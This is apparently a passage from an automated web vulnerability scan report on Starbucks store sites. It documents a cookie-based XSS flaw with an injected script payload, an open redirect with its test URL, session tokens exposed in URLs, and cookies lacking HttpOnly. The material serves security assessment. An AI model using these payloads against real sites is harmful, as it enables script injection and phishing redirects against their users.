3.108. http://www.starbucksstore.com/tea [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /tea

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4fa1</script><script>alert(1)</script>297d9261d7d was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tea HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf4fa1</script><script>alert(1)</script>297d9261d7d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26007
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:58 GMT
Connection: close


       <head>
       <title>Tea at Starbucks Store</title>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
       <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
...[SNIP]...
ageName="Tazo Tea HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Tazo Tea HomePage"
   var s_prop3="SBPTPAHP1SHTBF4FA1</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>297D9261D7D"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/tea/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=
...[SNIP]...

4. Session token in URL  previous  next
There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://www.starbucks.com/about-us  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /about-us

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about-us HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:21 GMT
Connection: close
Content-Length: 38166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

4.2. http://www.starbucks.com/site-map  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.starbucks.com
Path:   /site-map

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /site-map HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:48:27 GMT
Connection: close
Content-Length: 91508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<li><a href="http://news.starbucks.com/archive.cfm?CFID=3052726&amp;CFTOKEN=8332390bc1ef3916-0F6C385F-BE80-8ECA-DDDC9A0DCA48A727">Press Release Archives</a>
...[SNIP]...

5. Open redirection  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The value of the Redir request parameter is used to perform an HTTP redirect. The payload http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 was submitted in the Redir parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=http%3a//a249f6ddae8196a18/a%3f/products/shprodli.asp%3fDeptNo%3d8100%26ClassNo%3d8100%26SubClassNo%3d8750 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 360
Content-Type: text/html
Location: http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&ClassNo=8100&SubClassNo=8750&CCAID=SBPTPAHP1SHCO&Redir=http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&amp;ClassNo=8100&amp;SubClassNo=8750
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:30 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://a249f6ddae8196a18/a?/products/shprodli.asp?DeptNo=8100&amp;ClassNo=8100&amp;SubClassNo=8750
...[SNIP]...

6. Cookie without HttpOnly flag set  previous  next
There are 11 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



6.1. http://www.starbucksstore.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/coffee/via/flavored-coffee
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Cookie: CookingAd=CCREF=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee&CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21201
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:41 GMT

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...

6.2. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /GuestAssist/poweredbycooking.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GuestAssist/poweredbycooking.asp HTTP/1.1
Accept: */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp?error=noselection
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK; ASPSESSIONIDCABCBCAB=JKFLDLCBMLMOMLJLKGKMLOEI

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14191
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=NGKAELCBMACFABOABHGPBGCG; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:32:40 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...

6.3. http://www.starbucksstore.com/aff/adredir.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/coffee/via/flavored-coffee
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 153
Content-Type: text/html
Location: /?CCAID=SBPTPAHP1SHTB&Redir=
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee&CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: CCVC=Version=1%2E0&ID=1; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; path=/
Set-Cookie: SITESERVER=Version=1%2E0&ID=DE0B6174EFBD473A88E1F376B9850057; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACABBACA=MBGMDLCBHELMFOOGJGHBALMA; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:52 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/?CCAID=SBPTPAHP1SHTB&amp;Redir=">here</a>.</body>

6.4. http://www.starbucksstore.com/aff/adredir.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/coffee/via/flavored-coffee
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 153
Content-Type: text/html
Location: /?CCAID=SBPTPAHP1SHTB&Redir=
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee&CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: CCVC=Version=1%2E0&ID=1; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; path=/
Set-Cookie: SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:40 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/?CCAID=SBPTPAHP1SHTB&amp;Redir=">here</a>.</body>

6.5. http://www.starbucksstore.com/guestassist/shcontus.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /guestassist/shcontus.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /guestassist/shcontus.asp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/?CCAID=SBPTPAHP1SHTB&Redir=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20601
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=IMPPDLCBFMIGCMOPJPJFLFOO; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:21:14 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...

6.6. http://www.starbucksstore.com/guestassist/shcontus.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /guestassist/shcontus.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /guestassist/shcontus.asp?error=noselection HTTP/1.1
Host: www.starbucksstore.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20689
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=Version=1%2E0&CCAID=SBDirect; expires=Thu, 16-Dec-2010 08:00:00 GMT; domain=www.starbucksstore.com; path=/
Set-Cookie: CCVC=Version=1%2E0&ID=1; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: CCREFID=Version=1%2E0&ID=Direct; path=/
Set-Cookie: SITESERVER=Version=1%2E0&ID=8213B6214A894733BDB685D9935553E7; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSCDCCADA=KPMAELCBGJLKLOOPBBINAGDI; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:33:45 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...

6.7. http://www.starbucksstore.com/guestassist/shgaemailconfirm.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaemailconfirm.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /guestassist/shgaemailconfirm.asp HTTP/1.1
Host: www.starbucksstore.com
Proxy-Connection: keep-alive
Referer: http://www.starbucksstore.com/guestassist/shgaform.asp
Cache-Control: max-age=0
Origin: http://www.starbucksstore.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CookingAd=Version=1%2E0&CCAID=SBDirect; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=Direct; SITESERVER=Version=1%2E0&ID=AC3A5C5B95534FDD921B69406EFD3A13; ASPSESSIONIDCABCBCAB=HFGLDLCBGCDBDIJEHPIPCKKA; __utmz=9087863.1289934824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1312787331-1289934823813; ASPSESSIONIDACACCDBA=POGLDLCBAAAEGEBIMPBBLEID; s_cc=true; __utma=9087863.993059575.1289934824.1289934824.1289934824.1; __utmc=9087863; __utmb=9087863.2.10.1289934824; s_sq=cookstarbucksstore%3D%2526pid%253D/guestassist/shgaform.asp%2526pidt%253D1%2526oid%253Dhttp%25253A//iweb.starbucksstore.com//images/starbucks/btn_submit2.gif%2526ot%253DIMAGE
Content-Length: 628

txtFirstName=Hoyt&txtMidInitial=&txtLastName=LLC&txtEMailAddress=h02332%40gmail.com&cboSubTopics=5&txtareaMessage=Hello+and+Good+Day-%0D%0A%0D%0AHoyt+LLC+from+David%2C+Ma..+this+is+David..%0D%0A2+issu
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12588
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=HCCBELCBGFGJAEFDAFOHNILL; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:39:41 GMT

<!--S1--><!--S0-->
   

<!-- Common Function include file -->

<!-- EMail include file -->


<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HT
...[SNIP]...

6.8. http://www.starbucksstore.com/guestassist/shgaform.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaform.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /guestassist/shgaform.asp HTTP/1.1
Host: www.starbucksstore.com
Proxy-Connection: keep-alive
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp?error=noselection
Cache-Control: max-age=0
Origin: http://www.starbucksstore.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CookingAd=Version=1%2E0&CCAID=SBDirect; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=Direct; SITESERVER=Version=1%2E0&ID=AC3A5C5B95534FDD921B69406EFD3A13; ASPSESSIONIDCABCBCAB=HFGLDLCBGCDBDIJEHPIPCKKA; s_cc=true; __utmz=9087863.1289934824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9087863.993059575.1289934824.1289934824.1289934824.1; __utmc=9087863; __utmb=9087863.1.10.1289934824; __qca=P0-1312787331-1289934823813; s_sq=cookstarbucksstore%3D%2526pid%253D/guestassist/shcontus.asp%2526pidt%253D1%2526oid%253Dhttp%25253A//iweb.starbucksstore.com//images/starbucks/btn_writeemail.gif%2526ot%253DIMAGE
Content-Length: 67

cboSubjects=1000&cboSubTopics=1006&EMail.x=83&EMail.y=9&EMail=email

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16848
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSCDCCADA=JDPAELCBMFLNOOGBJGPPEOAB; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:36:18 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...

6.9. http://www.starbucksstore.com/guestassist/shgaform.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaform.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /guestassist/shgaform.asp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK
Content-Length: 54

cboSubjects=1000&cboSubTopics=100&EMail.x=67&EMail.y=7

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 164
Content-Type: text/html
Location: /guestassist/shcontus.asp?error=noselection
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=HABAELCBHLOMNPJNKIPJJFHG; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:22:10 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/guestassist/shcontus.asp?error=noselection">here</a>.</body>

6.10. http://www.starbucksstore.com/coffee-machines/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee-machines/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

